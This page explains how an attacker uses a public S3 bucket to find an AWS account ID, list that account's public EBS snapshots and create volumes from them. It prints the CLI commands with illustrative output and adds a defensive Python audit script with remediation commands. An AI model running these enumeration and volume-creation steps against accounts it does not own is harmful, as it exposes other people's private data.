
Public S3 Bucket Leads to Discovery of Public EBS Snapshots

  1. Use s3-account-search to Identify the AWS Account ID

    • The attacker uses the s3-account-search tool to extract the AWS Account ID associated with a public S3 bucket:
      s3-account-search arn:aws:iam::[attackerAccountId]:role/[attackerCreatedRole] [bucketName]
    • Output: The tool reveals the AWS Account ID:
      Account ID: 123456789012
  2. Search for Public EBS Snapshots

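    • With the discovered Account ID, the attacker queries for public Elastic Block Store (EBS) snapshots. Because the call is made from the attacker's own account, it returns only snapshots owned by that Account ID that are public or shared with the caller: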
      aws ec2 describe-snapshots --owner-ids 123456789012 --query "Snapshots[*].[SnapshotId, VolumeId, StartTime]" --output table
    • Output: The attacker identifies several public snapshots:
      ------------------------------------------------------------------------
      |                       DescribeSnapshots Output                       |
      ------------------------------------------------------------------------
      | SnapshotId             | VolumeId             | StartTime            |
      ------------------------------------------------------------------------
      | snap-01234abcd5678efgh | vol-0123456789abcdef | 2024-12-10T12:34:56Z |
      | snap-09876zyxwv5432qrs | vol-0987654321fedcba | 2024-12-11T14:56:78Z |
      ------------------------------------------------------------------------
  3. Analyze and Exploit the EBS Snapshots

    • The attacker can now copy these snapshots or create volumes from them in their own account, then attach and mount those volumes for further analysis, potentially accessing sensitive data such as configuration files, database backups, or private keys.

    • Example: The attacker creates a volume from a snapshot:

      aws ec2 create-volume --snapshot-id snap-01234abcd5678efgh --availability-zone us-east-1a
    • Result: The attacker gains unauthorized access to sensitive information stored in the EBS snapshots.
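
From the defender's side, the exposure in steps 2 and 3 can be found by auditing the createVolumePermission attribute of your own snapshots. The following is an added example, not part of the original page: the snapshot IDs, account IDs and the TRUSTED_ACCOUNTS allow-list are constructed, and the input mirrors the AWS CLI responses named in the comments.

```python
# Constructed sample. Each entry merges one item of
#   aws ec2 describe-snapshots --owner-ids self
# with that snapshot's
#   aws ec2 describe-snapshot-attribute --attribute createVolumePermission
SAMPLE = [
    {"SnapshotId": "snap-0aaaaaaaaaaaaaaa1", "Encrypted": False,
     "CreateVolumePermissions": [{"Group": "all"}]},
    {"SnapshotId": "snap-0aaaaaaaaaaaaaaa2", "Encrypted": True,
     "CreateVolumePermissions": [{"UserId": "111122223333"}, {"UserId": "999999999999"}]},
    {"SnapshotId": "snap-0aaaaaaaaaaaaaaa3", "Encrypted": False,
     "CreateVolumePermissions": []},
]

TRUSTED_ACCOUNTS = {"111122223333"}  # assumption: accounts you intend to share with


def audit_snapshots(snapshots, trusted=TRUSTED_ACCOUNTS):
    """Return a finding for every snapshot that is public or shared outside `trusted`."""
    findings = []
    for snap in snapshots:
        perms = snap.get("CreateVolumePermissions", [])
        # {"Group": "all"} means any AWS account can create a volume from it.
        public = any(p.get("Group") == "all" for p in perms)
        external = sorted(p["UserId"] for p in perms
                          if "UserId" in p and p["UserId"] not in trusted)
        if not public and not external:
            continue
        # Build the CLI call that revokes exactly the unwanted permissions.
        fix = ["aws", "ec2", "modify-snapshot-attribute",
               "--snapshot-id", snap["SnapshotId"],
               "--attribute", "createVolumePermission",
               "--operation-type", "remove"]
        if public:
            fix += ["--group-names", "all"]
        if external:
            fix += ["--user-ids", *external]
        findings.append({"snapshot": snap["SnapshotId"], "public": public,
                         "external_accounts": external,
                         "encrypted": snap.get("Encrypted", False),
                         "remediation": " ".join(fix)})
    return findings


if __name__ == "__main__":
    for finding in audit_snapshots(SAMPLE):
        print(finding)
```

Public snapshots are always unencrypted, since EBS does not allow an encrypted snapshot to be shared publicly. Running `aws ec2 enable-snapshot-block-public-access --state block-all-sharing` blocks public sharing of snapshots for the account in that Region.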